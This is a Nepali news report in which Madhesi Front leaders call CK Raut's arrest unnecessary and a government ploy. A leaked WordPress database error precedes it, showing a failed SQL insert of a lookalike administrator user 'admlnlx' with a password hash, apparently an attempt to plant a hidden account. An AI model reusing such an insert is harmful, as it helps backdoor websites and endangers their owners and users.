WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BA7J5MtVOZhntadTUJ0NuTkaAdLsxD1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-26 21:33:05', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २१ –
संयुक्त लोकतान्त्रिक मधेसी मोर्चाका नेताहरुले सीके राउतलाई पक्राउ गर्नु आवश्यक नभएको प्रतिक्रिया दिएका छन् ।मधेसी मोर्चाका मुद्दा ओझेल पार्न सरकारले नै योजनाबद्ध रुपमा राउतलाई पक्राउ गर्ने गरेको उनीहरुको आरोप छ ।
राउत पक्राउ परेलगत्तै सद्भावना पार्टीका महासचिव मनीष सुमनले सीके राउतलाई पक्रन आवश्यक नभएको प्रतिक्रिया दिए । ‘सीके राउतको विचारलाई सरकारले एक्ल्याउनुपर्थ्यो,’ उनले भने- ‘तर सरकारले सीके राउतको विचारलाई एक्ल्याउनतिर नलागी पक्राउ गर्यो, जसको कुनै औचित्य छैन् ।’
यस्तै राष्ट्रिय मधेस समाजवादी पार्टीका महासचिव केशव झाले मधेसी मोर्चाका मुद्दा ओझल पार्न सरकारले योजनाबद्ध रुपमा बेलाबेला सीके राउतलाई पक्रने र छाड्ने गरेको आरोप लगाए ।
‘हामीले नौ महिनासम्म मधेस आन्दोलन गर्यौं तर त्यतिखेर सीके राउतको कुरा कतै पनि आएन तर अहिले किन आयो ? यसमा सरकार पक्षबाटै गम्भीर षडयन्त्र भइरहेको छ ।’